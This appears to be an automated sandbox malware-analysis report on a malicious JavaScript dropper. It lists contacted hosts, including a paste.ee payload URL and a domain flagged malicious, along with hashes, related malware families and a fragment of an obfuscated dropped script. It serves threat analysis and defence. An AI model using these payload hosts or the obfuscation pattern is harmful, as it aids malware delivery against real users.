                                                                            https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2278601121.00000176B8645000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://paste.ee/d/69wscript.exe, 00000000.00000002.2397950475.000002375F090000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=choice.exe, 0000000A.00000003.2388557028.0000000002D39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://secure.gravatar.comwscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://themes.googleusercontent.comwscript.exe, 00000000.00000002.2398543416.00000237612CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2390641520.00000237612CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389902837.00000237610B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1963200942.00000282872F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        151.101.1.137
                                                                                        		cloudinary.map.fastly.netUnited States
                                                                                        		54113FASTLYUSfalse
                                                                                        192.186.57.30
                                                                                        		www.yxni.vipUnited States
                                                                                        		395776FEDERAL-ONLINE-GROUP-LLCUStrue
                                                                                        104.21.84.67
                                                                                        		paste.eeUnited States
                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1567224
                                                                                        Start date and time:2024-12-03 10:04:06 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 15s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:13
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:1013911.js
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winJS@15/9@3/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 80%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 73
                                                                                        • Number of non-executed functions: 250
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .js

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 4.175.87.197, 23.32.238.121, 23.32.238.152, 192.229.221.95, 52.165.164.15
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7464 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: 1013911.js

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        04:05:00API Interceptor71x Sleep call for process: powershell.exe modified
                                                                                        04:06:24API Interceptor632683x Sleep call for process: choice.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        151.101.1.137http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                          https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                            https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                              https://www.postman.com/postman-account/Get hashmaliciousUnknownBrowse
                                                                                                https://pitch.com/public/f3efe39e-ece6-4e9c-abe8-1a8052876a2fGet hashmaliciousUnknownBrowse
                                                                                                  http://url1578.fundawithjyoti.com/ls/click?upn=yFeSTx5DQPiItplIvZtCPdAv3GpeMYxjprPyDOCgTw1xm5EF-2BSU-2FZwHfXBSOkRTYIwSi_PM4alGcAZ86A1O3u51J4mEQLFGtubxWdVTg6-2FcJBO1jp9oyNXZ6mQSzeNX-2B7VKKHaPBntWFf6zrDi2LaKqtvUzASDJDri9snRnhQmfVJu93OvrNKf6Snskbo4Mar5fZfKgMrMZV4l2iAuDUHqpnBu4YaiZKY2P5OfELBNW9EfAa-2Bok0-2FIzO3PqWMlvgZ-2Fje-2FUU8UZBB1GxMGbjln9hLRizR8o-2Fr50XlWOzT0j9e1u4nN66dlXcpcm5W2p7cHgy5GE7mk2dn5NzOWuGvU2lGlr0NN3TD0cG7S4-2BjTresT7iZcn-2BAPBTa7I25wE9mA8TVmpfnjR4h9ZIBZWWJUW7TK929wF1RSkjooMmCtEk4K5GC1sj7iJpvWk-2BhZBRiN-2BsTXm3yWxaq8MVvX2pZ37cZLxGXME0rnnb84oAEnXw9piVOzqcTP8hhqQH4ZlHnyNDwBIS4Mav7-2BGywdgWfbuvCEFheFdZoHpKiKAPQnnBUuCY-2FKQjMYjvPsHNMtI4G4rjtmVkrXr9Aw3lrHejW-2FVq1tIkTK6WHtZyqprzbin6N1UrjzZ27Iu09egdWJUN6FoiB0yRpNYIvO0xs4ncpF6m7kT9F7zNhlO4-2Fn41yMLMfCywxEgIGAdzizC6vZalFQqzXfvLP5uQrdsFEvgXTZ1Uq23AFkvmhLmefr5OZh8f5SasfPLx08zJxZeINsv2YigPAW5TK7c9dAoOi32BKFv-2FP5qJIhzdOIWWRkPfDi1GZjxIDHkkUOQsdGXFwKX5GHPFk2DAsz2yAsUZxOKp40NHQm-2BOlBdtsFRs4dO9adR1QT-2F8OCf-2BLxBlXPYley6fhoPj850B2eVJ4DvMsA7QLr-2FX1aPQe8Eh9ozsOqOl-2FWqEH5zP49MOYRxvkitzx89YSOXTqM&c=E,1,-IYx59KsfzGYtK54bJA2fYABiNk3BZVZFDoiFUZPOnduDII2JTWNl4pt0tezpZxBRNlQtMTJXh0gayWDNghKvyhRHgt1ZkW4KYejOeeszJ5dYA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                    http://url1578.fundawithjyoti.com/ls/click?upn=yFeSTx5DQPiItplIvZtCPdAv3GpeMYxjprPyDOCgTw1xm5EF-2BSU-2FZwHfXBSOkRTY9VfP_LkNaGjuMCrzJijP9uh5w57wdISsksD9CBfEZ-2BrfK6ZUpdJZpybqcBifmJzUAvvwhAVHMxRUmUMr-2BxO7spTdP0ysoCSsRZw4-2Bqt5aYqgpU-2BweQIHrxwwrQwtKLhUFxZbuEzR0-2B1DDFfaN0u5mO9NJ78LGH7PNZSst0DP98TtCXNQ-2BEclNP4eRWT1vtsoTyFo9rc04sDl2-2BeZpmQ0vdMbC0EYiNG6hWr4ETvZ6w8uelsK-2B4xFpRygn6HaRMN4qGIOLDMfrTBwyaRtU05-2BMkllrHT9-2F-2BhZQUODx74s7ttVjTcDcwqfPvq47cnMo51YFx8jZPaBArTyBMXadMJxZUR-2B-2FTczxW10IHB-2B7gMx-2F5ntMlvqLjK-2BKT5vcom-2FYuqq2PbapPcywbeAeSLd7fSRpVqO5bnW6Ie3apQNjMN-2FKrpQf2ao49p-2FvPho99k49DXIPb-2BIrCBiV5yAP2Xg-2BIQ9H6V9hHmXebme9ef73yjbom9Y7sA8kWAiiFCEtjx-2ByV9QKnWrMXfV0zLwzpGvl6KWeYX45fH-2BQ0gVvd52UZw7z6Y8bwMOqoEVZ1CAwiA1ZI1n3amGEghly4r30O34EdzWa2OeZcooKwEE52ZANqsMMAgiwX-2FXeGg-2BXLQehO84roPzTVCB1vq42r1qNxXzzoDwEBUD37jI0S0Nz-2B7R5uYEnr4aa22GanbYwjvrOmFr8MkGEoqTYZhbBBRFA11TGS6ks36EN7F-2BzsOP1YayRt4rgbqnCwL-2Fx8K6-2FR4NL-2BkRCH5fpH5YEmCsLXcZPzO8Cq2S00OugSL99m8qNGYy0HUFuCuqiMlOgTxvkp7SxVXsMCSuQxD1YxqpkH7EZwGl-2FfbdZcy09AeG8ePiepg1tADVQCxeQaKw-3DGet hashmaliciousUnknownBrowse
                                                                                                      http://v9wmp.wehoo.cc/34546de4235m342356?affsub2=qJxbdSCOq&st=8/7/2023%202:30:36%20AMGet hashmaliciousUnknownBrowse
                                                                                                        https://investordaily.us5.list-manage.com/track/click?u=b5150547bc871ea4865df93c3&id=bccc4d28c8&e=fd283ff2f0Get hashmaliciousHTMLPhisherBrowse
                                                                                                          https://asset.cloudinary.com/djrburxlv/8550016f9904cb3410d98650cd7adc91Get hashmaliciousHTMLPhisherBrowse
                                                                                                            104.21.84.67Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • paste.ee/d/MQJcS
                                                                                                            Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                            • paste.ee/d/u4bvR
                                                                                                            rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                            • paste.ee/d/SDfNF
                                                                                                            Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/enGXm
                                                                                                            Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/wXm0Y
                                                                                                            SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/eA3FM
                                                                                                            dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/JZHbW
                                                                                                            P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/kmRFs
                                                                                                            comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                            • paste.ee/d/cJo7v
                                                                                                            RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • paste.ee/d/EgkAG

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            cloudinary.map.fastly.nethttp://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                            • 151.101.129.137
                                                                                                            Steelcase Series 1 Sustainable Office Chair _ Steelcase.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.129.137
                                                                                                            https://jenifer-lopezz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                            • 151.101.129.137
                                                                                                            https://bookme.name/simonmed/usGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                            • 151.101.129.137
                                                                                                            http://carajasnutricaoanimal.comGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.65.137
                                                                                                            http://itsecurityupdate.comGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.137
                                                                                                            https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvMGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.193.137
                                                                                                            https://www.payment.token2049.com/page/3156941?widget=true&Get hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.137
                                                                                                            https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174dGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.137
                                                                                                            https://www.postman.com/postman-account/Get hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.137
                                                                                                            paste.eeasegurar.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.187.200
                                                                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.84.67
                                                                                                            MT103-8819006.DOCS.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.187.200
                                                                                                            Rooming list.jsGet hashmaliciousRemcosBrowse
                                                                                                            • 104.21.84.67
                                                                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • 172.67.187.200
                                                                                                            asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                            • 104.21.84.67
                                                                                                            PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                                                                                            • 172.67.187.200
                                                                                                            LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                            • 172.67.187.200
                                                                                                            PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.187.200
                                                                                                            s-part-0035.t-0009.t-msedge.netfred.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            untrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            1L8qjfD9J2.exeGet hashmaliciousNjratBrowse
                                                                                                            • 13.107.246.63
                                                                                                            INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            PI-02911202409#.xlaGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            FASTLYUSfred.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.130.137
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.193.91
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.91
                                                                                                            Quarantined Messages-9.zipGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.2.137
                                                                                                            Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 151.101.130.137
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.91
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.65.91
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.65.91
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.91
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 151.101.1.91
                                                                                                            FEDERAL-ONLINE-GROUP-LLCUSla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 192.186.10.220
                                                                                                            vJSyCK4is2.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 192.186.57.229
                                                                                                            12029.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            qmF3fz3Zn4.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            file.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            file.exeGet hashmaliciousGlupteba, GuLoader, Socks5Systemz, StealcBrowse
                                                                                                            • 192.186.7.211
                                                                                                            file.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            J21vdSW40R.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            file.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            file.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • 192.186.7.211
                                                                                                            CLOUDFLARENETUSfred.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.212.141
                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.159.24
                                                                                                            https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.26.13.205
                                                                                                            https://web.goods-full.link/#/pages/recharge/components/order?type=usdtGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.66.212
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                            • 104.21.16.9
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.165.166
                                                                                                            cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.230.132
                                                                                                            HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.231.132
                                                                                                            dFezsjdHtg.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.230.132
                                                                                                            pjAYMCVbvK.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.231.132

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            28a2c9bd18a11de089ef85a160da29e4fred.htmlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://web.goods-full.link/#/pages/recharge/components/order?type=usdtGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            Quarantined Messages-9.zipGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            1L8qjfD9J2.exeGet hashmaliciousNjratBrowse
                                                                                                            • 13.107.246.63
                                                                                                            Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            KMS_VL_ALL_AIO.cmdGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                            • 13.107.246.63
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0euntrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            https://Lakeheadu.hlov.de/Szii3aFWcmivgihoevuc/trTlqgskL4/K3qRQz5Ggziclxgen/t3JiPvu/Szii3aFWcmivgihoevuc/Advising/YSxMdD/lakeheadu.ca/Szii3aFWcmivgihoevucGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.21.84.67
                                                                                                            • 151.101.1.137
                                                                                                            37f463bf4616ecd445d4a1937da06e19cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            dFezsjdHtg.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            pjAYMCVbvK.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            MyLUNcS8wx.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            INTRUM65392.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.84.67
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                            • 104.21.84.67
                                                                                                            00onP4lQDK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            • 104.21.84.67
                                                                                                            678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.84.67
                                                                                                            doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 104.21.84.67

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\69SP6[1].txt

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\wscript.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):158537
                                                                                                            Entropy (8bit):5.5298288159427935
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:XsYLPbdfgSBsYLPa60th/n/70xxeWTBIRArQnDvxRQ0AMmXLMkAvZjpKy+DNmX/n:XdbJTBdbAAdbJTBdba
                                                                                                            MD5:09C464C5A093ABE3B6DCFFCB63B707A6
                                                                                                            SHA1:A49070306F8B1337361B621EFAFEEF0AEE9EF6F9
                                                                                                            SHA-256:8219DBF8AFE5564E153E2F354254BA29AC7B84BD5B1D6AF3FAA32133AE33492C
                                                                                                            SHA-512:EB530DA9A54484A7F3FAADCB4085F0959CFCF82738E334F57C610DF91E6A86056B1CEC95BC989FF46B4D554BC4409866026BCADF88E0C57EA20A413D4FEE8FAA
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:PkWozPeWencNJpb = "kcKgcxiodWfLWPi"..iUbmWapNUANiLAd = "mZkRptWWWKiGIhn"..psCeWLhQoZtbfrW = "OZKdWhPLjWkOKba"..PHLQikLeHCmnKlf = "PLvWzWviLgkiKpL"..LGilGWGPOiogLBN = "UAaWheLhWLlPqBz"..HWihdKuKnxUGdmG = "efNbWLPaIALAjfA"..SKNoLmLxLeWknKl = "KGTumLnGNGPKURN"..PNQcGiOAtoLtLIc = "KZRRzmmNLGsTbLP"..idAAJRpWPmPaBTb = "rLNZKiWLKKPzKko"..fLWCriWzBGbLjCJ = "nLzoNeWLGeKaLhm"....WQhofUHWehlNJmL = "alieGLPWpmCWmta"..iCBGbWmoHKxILhO = "cikLrJWuKdLHkGd"..oGcaWcuUIecCWZR = "xAfClzBcUWsLKGf"..bWLcAuheKKKgbvK = "WxeWtKiiGOdLPNz"..kkKWoWcpdHCZPiG = "LlHQptGoWumiGKK"..UUKnzdeuLmLgzSN = "vLGlxqGiCfoZWdc"..izRzUzPAuAtGLWh = "gcmcLWjSfeUWGfL"..rZWijWPJuWUAuZN = "dJWiSzWiaxUAKLe"..cLcethkKJofkWUK = "qWBdezZcAZGmWiC"..KhcUQbhozhrWCpp = "OQocGOZtkakWZAo"....nZNiPRKWtWKCzcN = "iLGKGJNicKiiAKn"..APkLLWLcoLhLWdz = "KPkKQqbLNUJfeoA"..qWhUAtNPWlemzLK = "NKclPZPLGUtAuWC"..LmOkiWxBrHAWANJ = "cPWGtNJezKfQIWi"..LhifpChZzZkCbrR = "vWaGGBdHjzbhmWl"..LBZbUKNAiOiKuCi = "OHHcLQCSKWilLzP"..ckLPqxGdvLGUtJo = "uAKzNbiqLqWiWzq

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):9434
                                                                                                            Entropy (8bit):4.928515784730612
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                            MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                            Malicious:false
                                                                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

